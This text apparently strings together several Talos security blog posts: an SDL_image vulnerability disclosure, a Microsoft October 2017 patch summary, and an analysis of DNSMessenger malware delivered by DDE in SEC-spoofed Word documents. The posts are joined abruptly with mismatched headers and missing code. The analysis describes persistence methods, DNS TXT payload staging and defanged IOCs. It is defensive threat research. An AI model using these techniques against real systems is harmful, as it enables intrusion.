Snort Rules: 43725-43726 (TALOS-2017-0387), 44178-44179 (TALOS-2017-0427), 44451-44452 (TALOS-2017-0458)

Today, Talos is disclosing two vulnerabilities that have been identified in the Simple DirectMedia Layer library. Simple DirectMedia Layer (SDL) is a cross-platform development library designed for use in video playback software, emulators, and games by providing low level access to audio, keyboard, mouse, joystick, and graphics hardware. SDL, via its SDL_image library, also has the capability to handle various image formats such as XCF, the default layered image format for GIMP.

An attacker could compromise a user by exploiting one of these vulnerabilities via a specifically crafted file that SDL would handle, such as a XCF file.

Given that numerous applications make use of SDL, Talos has coordinated with the SDL community to disclose these vulnerabilities and ensure that an updated version of the library is available to use.

Vulnerability Details

Both vulnerabilities highlighted in this post were identified by Yves Younan.

CVE-2017-2887/TALOS-2017-0394 - Simple DirectMedia Layer SDL_image XCF Property Handling Code Execution Vulnerability

A buffer overflow vulnerability has been identified which could lead to arbitrary code execution on an affected host. This vulnerability manifests due to insufficient validation of data read from a file and subsequent use of the data. In this case, the `id` and `length` attributes read from an XCF image file are used without validation, potentially resulting in a stack-based buffer overflow.

CVE-2017-2888/TALOS-2017-0395 - Simple DirectMedia Layer Create RGB Surface Code Execution Vulnerability

An integer overflow vulnerability has been identified which could lead to arbitrary code execution on an affected host. This vulnerability manifests when creating a new RGB surface via a call to the `CreateRGBSurface` function. A sufficiently large width and height value passed to this function could cause a multiplication operation to overflow, thus resulting in too little memory being allocated. Subsequent writes would then be out-of-bounds.

For the full technical details of these vulnerabilities, please visit the Vulnerability Reports portal on our website.

Coverage

Talos has released the following Snort rules to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 43855-43856, 43858, 43860

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 63 new vulnerabilities with 28 of them rated critical and 35 rated important. These vulnerabilities impact Graphics, Edge, Internet Explorer, Office, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more.

Vulnerabilities Rated Critical

The following vulnerabilities are rated "Critical" by Microsoft:

• CVE-2017-11813 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-11822 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-11762 - Microsoft Graphics Remote Code Execution Vulnerability
• CVE-2017-11763 - Microsoft Graphics Remote Code Execution Vulnerability
• CVE-2017-11797 - Scripting Engine Information Disclosure Vulnerability
• CVE-2017-11767 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11792 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11793 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11796 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11798 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11799 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11800 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11801 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11802 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11804 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11805 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11806 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11807 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11808 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11809 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11810 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11811 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11812 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11821 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11779 - Windows DNSAPI Remote Code Execution Vulnerability
• CVE-2017-11771 - Windows Search Remote Code Execution Vulnerability
• CVE-2017-8727 - Windows Shell Memory Corruption Vulnerability
• CVE-2017-11819 - Windows Shell Remote Code Execution Vulnerability

CVE-2017-11813, CVE-2017-11822 - Internet Explorer Memory Corruption Vulnerability

Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.

CVE-2017-11762, CVE-2017-11763 - Microsoft Graphics Remote Code Execution Vulnerability

Two vulnerabilities have been identified in the font library of the Microsoft Graphics Component that could allow an attacker to execute arbitrary code. These vulnerabilities manifest due to the library incorrectly handling specialty embedded fonts within a web page or document. Exploitation of these two vulnerabilities could be achieved if a user navigates to a malicious web page or if the user opens a specially crafted document that exploits these vulnerabilities.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked "safe for initialization."

The following is a list of CVEs related to these vulnerabilities:

• CVE-2017-11767
• CVE-2017-11792
• CVE-2017-11793
• CVE-2017-11796
• CVE-2017-11797
• CVE-2017-11798
• CVE-2017-11799
• CVE-2017-11800
• CVE-2017-11801
• CVE-2017-11802
• CVE-2017-11804
• CVE-2017-11805
• CVE-2017-11806
• CVE-2017-11807
• CVE-2017-11808
• CVE-2017-11809
• CVE-2017-11810
• CVE-2017-11811
• CVE-2017-11812
• CVE-2017-11821

CVE-2017-11779 - Windows DNSAPI Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Windows DNS that could allow an attacker to execute arbitrary code in the context of the Local System account. This vulnerability manifests in DNSAPI.dll as a result of improperly handling DNS responses. A scenario where this vulnerability could be exploited would be one where an attacker stand ups a malicious DNS server to transmit specially crafted DNS responses to the target.

CVE-2017-11771 - Windows Search Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Window Search that could allow an attacker to elevate their privileges and subsequently execute code in the elevated context. This vulnerability manifests due to improper handling of objects in memory. For this vulnerability to be exploited, an attacker would need to either have access to the targeted host to exploit this vulnerability, or remotely trigger it through an SMB connection.

CVE-2017-8727 - Windows Shell Memory Corruption Vulnerability

A remote code execution vulnerability has been identified in Internet Explorer which could allow an attacker to execute arbitrary code in the context of the current user. This vulnerability manifests as a result of Internet Explorer improperly accessing objects in memory via the Microsoft Windows Text Services Framework. An attacker could create a specially crafted web page that exploits this vulnerability and subsequently socially engineer a user to visit the page to compromise users. Additionally, attackers could leverage vulnerable or compromised websites or sites that display user-provided content or advertisements to exploit and compromise users.

CVE-2017-11819 - Windows Shell Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Microsoft web browsers which manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code in the context of the current user. An attacker could leverage this vulnerability to exploit users by crafting a specially formed web page and socially engineering users to visit such a page. Other scenarios include an attacker leveraging vulnerable or compromised websites or sites that display user-provided content or advertisements to exploit this vulnerability and compromise users.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:

• CVE-2017-11790 - Internet Explorer Information Disclosure Vulnerability
• CVE-2017-11794 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8726 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8693 - Microsoft Graphics Information Disclosure Vulnerability
• CVE-2017-8717 - Microsoft JET Database Engine Remote Code Execution Vulnerability
• CVE-2017-8718 - Microsoft JET Database Engine Remote Code Execution Vulnerability
• CVE-2017-11826 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-11825 - Microsoft Office Remote Code Execution Vulnerability
• CVE-2017-11775 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11777 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11820 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11776 - Microsoft Outlook Information Disclosure Vulnerability
• CVE-2017-11774 - Microsoft Outlook Security Feature Bypass Vulnerability
• CVE-2017-11772 - Microsoft Search Information Disclosure Vulnerability
• CVE-2017-11823 - Microsoft Windows Security Feature Bypass
• CVE-2017-11786 - Skype for Business Elevation of Privilege Vulnerability
• CVE-2017-11769 - TRIE Remote Code Execution Vulnerability
• CVE-2017-8689 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8694 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-11783 - Windows Elevation of Privilege Vulnerability
• CVE-2017-11816 - Windows GDI Information Disclosure Vulnerability
• CVE-2017-11824 - Windows Graphics Component Elevation of Privilege Vulnerability
• CVE-2017-11817 - Windows Information Disclosure Vulnerability
• CVE-2017-11765 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11784 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11785 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11814 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8715 - Windows Security Feature Bypass Vulnerability
• CVE-2017-11781 - Windows SMB Denial of Service Vulnerability
• CVE-2017-11782 - Windows SMB Elevation of Privilege Vulnerability
• CVE-2017-11815 - Windows SMB Information Disclosure Vulnerability
• CVE-2017-11780 - Windows SMB Remote Code Execution Vulnerability
• CVE-2017-11818 - Windows Storage Security Feature Bypass Vulnerability
• CVE-2017-8703 - Windows Subsystem for Linux Denial of Service Vulnerability
• CVE-2017-11829 - Windows Update Delivery Optimization Elevation of Privilege Vulnerability

CVE-2017-11790 - Internet Explorer Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Internet Explorer that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Internet Explorer improperly handling objects in memory. A user who navigates to an attacker-controlled web page could be exploited. Additionally, users who navigate to site that hosts user-generated content could also be exploited.

CVE-2017-11794 - Microsoft Edge Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Edge that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Edge improperly handling objects in memory. A user who navigates to an attacker-controlled web page could be exploited. Additionally, users who navigate to site that hosts user-generated content could also be exploited.

CVE-2017-8726 - Microsoft Edge Memory Corruption Vulnerability

A remote code execution vulnerability has been identified in Edge that could allow an attacker to execute arbitrary code in the context of the user. This vulnerability manifests due to Edge improperly handling objects in memory. Possible scenarios where an attacker could compromise a user could include a web-based attacks where a user navigates to a specially crafted web page under the attacker's control. Other possibilities include a user opening a Microsoft Office document containing an embedded ActiveX control marked "safe for initialization".

CVE-2017-8693 - Microsoft Graphics Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Microsoft Windows Graphics Component that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the Graphics component improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-8717, CVE-2017-8718 - Microsoft JET Database Engine Remote Code Execution Vulnerability

Two arbitrary code execution vulnerabilities have been identified in the Microsoft JET Database Engine that could allow an attacker to execute arbitrary code in the context of the current user. These vulnerabilities manifest as buffer overflow conditions when triggered. For an attacker to successfully exploit these vulnerabilities, a user would need to open or preview a specially crafted Microsoft Excel document on an affected version of Windows. An email-based attack where an attacker sends a victim a specially crafted Excel document is the most likely scenario where a user could be compromised.

CVE-2017-11826 - Microsoft Office Memory Corruption Vulnerability

A vulnerability have been identified in Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that in certain conditions, the Preview Pane is an attack vector as well.

CVE-2017-11825 - Microsoft Office Remote Code Execution Vulnerability

A vulnerability has been identified in Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.

Multiple CVEs - Microsoft Office SharePoint XSS Vulnerability

Multiple vulnerabilities in Microsoft Office Sharepoint have been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute scripts in the context of the current user, read content that the attacker would not otherwise have permission to view, or execute actions on behalf of the affected user.

The following CVEs reflect these vulnerabilities:

• CVE-2017-11775
• CVE-2017-11777
• CVE-2017-11820

CVE-2017-11776 - Microsoft Outlook Information Disclosure Vulnerability

An information disclosure vulnerability in Microsoft Outlook has been identified that could leak sensitive information to third-parties. This vulnerability manifests when Outlook fails to establish a secure connection. An attacker who exploits this vulnerability could obtain the email content of a user.

CVE-2017-11774 - Microsoft Outlook Security Feature Bypass Vulnerability

A security feature bypass vulnerability has been identified in Microsoft Outlook that could be used to execute arbitrary commands. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a specially crafted document file could be exploited. A scenario where this could occur would be in a file-sharing attack where an attacker gives the user a file and socially engineers them to open it.

CVE-2017-11772 - Microsoft Search Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows Search that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Window Search improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user sends specially crafted messages to the Window Search service. Alternatively, this vulnerability could be exploited remotely in an enterprise setting over an SMB connection from an unauthenticated attacker.

CVE-2017-11823 - Microsoft Windows Security Feature Bypass

A vulnerability had been identified in Device Guard that could allow an attacker bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could be run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-11786 - Skype for Business Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Skype for Business that could allow an authenticated attacker to potentially impersonate a user. This vulnerability manifests due to Skype for Business improperly handling specific authentication requests. An attacker who initiates an instant message session while a specially crafted profile image is set could exploit this vulnerability and steal an authentication hash that could be reused in different contexts. Successful exploitation would allow an attacker to perform actions that a user is permitted to do, resulting in various outcomes such as privilege escalation.

CVE-2017-11769 - TRIE Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Windows that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to the way certain Windows components improperly handle loading DLL files. Successful exploitation could allow an attacker to perform actions or execute commands within the context of the current user.

CVE-2017-8689, CVE-2017-8694 - Win32k Elevation of Privilege Vulnerability

Two vulnerabilities in Windows Kernel-Mode Drivers have been identified that could allow a privilege escalation attack to occur. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-11783 - Windows Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Windows that could allow an authenticated attacker to elevate their privileges to that of an administrator. This vulnerability manifests due to Windows improperly handling calls to Advanced Local Procedure Call (ALPC). A user who creates a specially crafted application and executes it on an affected system could exploit this vulnerability.

CVE-2017-11816 - Windows GDI Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Microsoft Windows Graphics Device Interface (GDI) that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the GDI improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11824 - Windows Graphics Component Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in the Microsoft Windows Graphics Component that could allow an attacker to elevate their privileges to that of an administrator. This vulnerability manifests due to the Graphics component improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11817 - Windows Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the kernel improperly initializing objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11784, CVE-2017-11785 - Windows Kernel Information Disclosure Vulnerability

Two information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to obtain memory addresses and bypass Kernel Address Space Layout Randomization (KASLR). Exploitation of these vulnerabilities could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit them.

CVE-2017-11765, CVE-2017-11814 - Windows Information Disclosure Vulnerability

Two information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to obtain information that could be used to further compromise an affected system. These vulnerabilities manifest due to the kernel improperly initializing objects in memory. Exploitation of these vulnerabilities could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit them.

CVE-2017-8715 - Windows Security Feature Bypass Vulnerability

A vulnerability had been identified in Device Guard that could allow an attacker to bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could be run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-11781 - Windows SMB Denial of Service Vulnerability

A denial of service vulnerability has been identified in Microsoft SMB that could allow an attacker to crash an affected host. This vulnerability manifests due to SMB improperly handling certain requests. An attacker who sends a vulnerable server specially crafted requests could exploit this vulnerability and create a denial of service condition for users.

CVE-2017-11782 - Windows SMB Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in the default Windows SMB Server configuration that could allow anonymous users to access certain named pipes. These named pipes could be used to send specially crafted requests to services that accept requests via named pipes. An attacker who is able to send SMB messages to an affected SMB server could exploit this vulnerability.

CVE-2017-11815 - Windows SMB Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows SMB that could allow an attacker to access files they otherwise should not have access to. This vulnerability manifests due to SMB server improperly handling certain requests. An attacker who is able to authenticate to the SMB server and send it SMB messages could exploit this vulnerability.

CVE-2017-11780 - Windows SMB Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Microsoft Server Message Block 1.0 (SMBv1) which could allow an attacker to compromise SMBv1 servers. This vulnerability manifests due to the way SMBv1 servers handle certain requests. Exploitation of this vulnerability could be achieved by an unauthenticated attacker by sending specially crafted requests to the affected server.

CVE-2017-11818 - Windows Storage Security Feature Bypass Vulnerability

A security feature bypass has been identified in Microsoft Windows storage which could allow an application with a certain integrity level to execute code at a different level. This vulnerability manifests due to Windows improperly validating an integrity-level check.

CVE-2017-8703 - Windows Subsystem for Linux Denial of Service Vulnerability

A denial of service vulnerability has been identified in the Windows Subsystem for Linux (WSL). This vulnerability manifests as due to the WSL improperly handling objects in memory. An attacker who creates a specially crafted application and executes it on an affected system could exploit this vulnerability.

CVE-2017-11829 - Windows Update Delivery Optimization Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Windows Update Delivery Optimization that could allow an attacker to overwrite files of a higher privilege than what the attacker possesses. This vulnerability manifests due to Windows Update Delivery Optimization improperly enforcing file share permissions. An attacker who is able to log into the system and create a Delivery Optimization job could exploit this vulnerability.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

• 44333-44334
• 44508-44519
• 44526-44529
• 44532-44533

This post was authored by Edmund Brumaghin, Colin Grady, with contributions from Dave Maynor and @Simpo13.

Executive Summary

Cisco Talos previously published research into a targeted attack that leveraged an interesting infection process using DNS TXT records to create a bidirectional command and control (C2) channel. Using this channel, the attackers were able to directly interact with the Windows Command Processor using the contents of DNS TXT record queries and the associated responses generated on the attacker-controlled DNS server.

We have since observed additional attacks leveraging this type of malware attempting to infect several target organizations. These attacks began with a targeted spear phishing email to initiate the malware infections and also leveraged compromised U.S. state government servers to host malicious code used in later stages of the malware infection chain. The spear phishing emails were spoofed to make them appear as if they were sent by the Securities and Exchange Commission (SEC) in an attempt to add a level of legitimacy and convince users to open them. The organizations targeted in this latest malware campaign were similar to those targeted during previous DNSMessenger campaigns. These attacks were highly targeted in nature, the use of obfuscation as well as the presence of a complex multi-stage infection process indicates that this is a sophisticated and highly motivated threat actor that is continuing to operate.

Technical Details

The emails associated with this malware campaign were spoofed to make them appear as if they had originated from the Securities and Exchange Commission (SEC) Electronic Data Gathering, Analysis, and Retrieval (EDGAR) system. For those not familiar with this system, EDGAR is an automated filing platform that organizations can use to submit filings which are legally required to be performed by publicly traded companies. This was likely done to increase the perceived legitimacy of the emails and increase the chances that the recipient would open the email and associated attachments.

The emails themselves contained a malicious attachment that when opened would initiate a sophisticated multi-stage infection process leading to infection with DNSMessenger malware. The malicious attachments were Microsoft Word documents. Rather than leveraging macros or OLE objects, which are some of the most common ways that Microsoft Word documents are leveraged to execute code, these attachments leveraged Dynamic Data Exchange (DDE) to perform code execution. A description of this technique has been published here. This technique has recently been publicized following a Microsoft decision that this functionality is a feature by design and will not be removed. We are now seeing it actively being used by attackers in the wild, as demonstrated in this attack.

Similar to the emails described above, the malicious attachments were made to appear as if they had originated from the SEC and include logos and branding as well as information that would be expected from any documents received from the SEC. When opened, victims would be greeted with a message informing them that the document contains links to external files, and asking them to allow/deny the content to be retrieved and displayed.


In the case of this attack, if the user allows the external content to be retrieved, the malicious document will reach out to attacker hosted content to retrieve code that will be executed to initiate the malware infection. Interestingly, the DDEAUTO field used by this malicious document retrieved code that the attacker had initially hosted on a Louisiana state government website, which was seemingly compromised and used for this purpose. The DDEAUTO command that is executed is below:

The aforementioned command results in the code hosted at the referenced URL to be downloaded and executed directly using Powershell. The contents of the code that is retrieved from the server is Powershell code and includes a code blob that is both Base64 encoded and gzipped. The code is retrieved, deobfuscated, then passed to the Invoke-Expression (IEX) cmdlet and executed by Powershell.

The deobfuscated code is responsible for staging and kicking off subsequent stages of the infection process. It is also responsible for achieving persistence on systems. The code features a number of ways that persistence may be achieved depending on the operating environment of the malware. It determines the version of Powershell on the infected system as well as the access privileges of the user to determine how to proceed with achieving this persistence.

First, a blob of code called $ServiceCode, which is also both base64 encoded and compressed using gzip, is written to the Windows registry using the following Powershell command:

A second block of code present in the Powershell is called $stagerCode and is responsible for extracting and decoding the code that was previously stored in the registry, then executing this code, first checking for the presence of the mutex '1823821749'. If this mutex does not exist, execution continues.

The malware then attempts to write the contents of $stagerCode along with the appropriate PowerShell command to execute it to the following registry locations, creating a new registry key called "IE"

• HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
• HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKCU:\Software\Microsoft\Windows\CurrentVersion
• HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
• HKLM:\System\CurrentControlSet\Services\VxD
• HKCR:\vbsfile\shell\open\command

The malware also creates a new scheduled task called "IE" that is responsible for executing $stagerCode each time the system boots, using a random startup delay period.

The malware then queries the system to determine the characteristics of the environment in which it is operating to determine how to proceed. It specifically checks the version of Powershell that is installed on the system. If the system is running a Powershell version later than Powershell 2.0, the malware will write the contents of $ServiceCode to an Alternate Data Stream (ADS) of the the following file location:

        %PROGRAMDATA%\Windows\kernel32.dll

The malware then checks to determine the privilege level of the user that was infected. If the user has administrative privileges on the infected system, it will set up a WMI event consumer and filter as an additional WMI-based persistence mechanism. The filter name is "kernel32_filter" and the consumer name is "kernel32_consumer". The Powershell code used for the performance of these tasks is below:

Once all of these tasks have completed, the malware then enters the next stage of the infection process by executing $stagerCode directly using the IEX Powershell cmdlet.

This next stage of the malware infection was heavily obfuscated with both variables and function names obscured. Most of the strings within this code were also base64 encoded. The code associated with this stage starts by defining an array containing a list of domains that will be used for subsequent Command and Control (C2) communications. A list of the domains in this array is included in the Indicators of Compromise section of this blog.

The malware also obtains the serial number of the system from the BIOS. It calculates the MD5 hash of the serial number and returns the first ten bytes.

• Example S/N: VMware-56 4d 64 66 d0 7d f4 26-2c ad a5 8b f8 51 26 f8
• Resulting Value: EFA29DD310

The malware then sets a counter value to zero. The aforementioned hash value, the hardcoded string "stage", the value of the counter, and a randomly selected domain from the array are then combined to create the initial hostname that will be used by the malware to start making DNS requests.

• Example Hostname: EFA29DD310.stage.0.ns0.pw

At this point the malware enters a loop which will continue until it receives an A record lookup result of 0.0.0.0 or any lookup fails entirely. The A record result represents a checksum value, which will be explained below. The IPv4 value returned by the DNS server in response to the A record request is then converted to an integer, then a binary number.

• Example IP: 107.50.99.116
• Integer Value: 1798464372
• Binary: 1101011001100100110001101110100

The same generated hostname is then used by the malware to make a TXT record request. The result of the TXT record query is then used to calculate an MD5 hash and the first eight bytes of the MD5 hash are then run through a checksum algorithm that returns an integer value which is converted into a binary number.

• Example TXT Query Result:

H4sIAIia3VkC/909a1fbSJafyTn5DxXhbkvYEpg8pgcjpnnkwXQgLNCTnnG8HdkqQGBLjiRDCPE5+x/2H+4v2XvrpdLLmE7m9J6lZ8BWVd133br3VpWyTE4vgoQkdJgGUUiSi2g68smAkmg8DlLqEy8hQUqgyySmCQ3hY0hOUu+cxo8fLRP3e/48ftTwo7EXhAlxyc+mESZrzuTGaLMPCVAjP068ofx8QweqpeMgjYn4rLesay1PM1BPNV

• MD5: 432B4077F72EE96CA70B57F10B68F35E
• Selected Bytes: 432B4077
• Checksum: 1126908023
• Binary: 1000011001010110100000001110111

Once the malware has both the binary values from the A record response and the above checksum calculation, they are compared. If the A record response and the TXT record response match, the result of the TXT record query response is appended to the end of a final resulting string, a new domain is then randomly selected from the array and the counter value previously mentioned, and included in the hostname used for queries, is incremented by one. If they don't match, the queries continue in kind until they do.

This process continues until the result of the A record lookup is 0.0.0.0, which indicates a completion of the code collection via DNS, at which time the resulting string is returned for further processing. This result string is then decoded using Base64 and decompressed using gzip. It is then passed to the Powershell IEX cmdlet to execute the code that was retrieved using DNS.

During analysis of this specific attack, we were unable to obtain this next stage of Powershell code from the C2 servers. Given the targeted nature of this attack it is likely that the attacker is restricting these communications in an attempt to evade analysis by information security companies and researchers. It's been reported that the stage 4 payload is documented here.

Conclusion

 

This attack shows the level of sophistication that is associated with threats facing organizations today. Attackers often employ multiple layers of obfuscation in an attempt to make analysis more difficult, evade detection and prevention capabilities, and continue to operate under the radar by limiting their attacks to only the organizations that they are targeting. It is also important for organizations to be aware of some of the more interesting techniques that malware is using to execute malicious code on systems and gain persistence on systems once they are infected. In this particular case, the malware featured the capability to leverage WMI, ADS, scheduled tasks, as well as registry keys to obtain persistence. The use of DNS as a conveyance for later stage code and C2 communications is also becoming more and more commonplace. Talos continues to monitor the threat landscape for unique and targeted attacks such as this one so that customers remain protected as attackers change the techniques they use to perform their malicious activities.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

The following Indicators of Compromise (IOCs) are associated with the attack described in this blog post.

Malicious Word Documents:

1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

Stage 2 PowerShell

8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
ec3aee4e579e0d1db922252f9a15f1208c4f9ac03bd996af4884725a96a3fdf6

Domains:

trt[.]doe[.]louisiana[.]gov
ns0[.]pw
ns0[.]site
ns0[.]space
ns0[.]website
ns1[.]press
ns1[.]website
ns2[.]press
ns3[.]site
ns3[.]space
ns4[.]site
ns4[.]space
ns5[.]biz
ns5[.]online
ns5[.]pw

IP Addresses:

206[.]218[.]181[.]46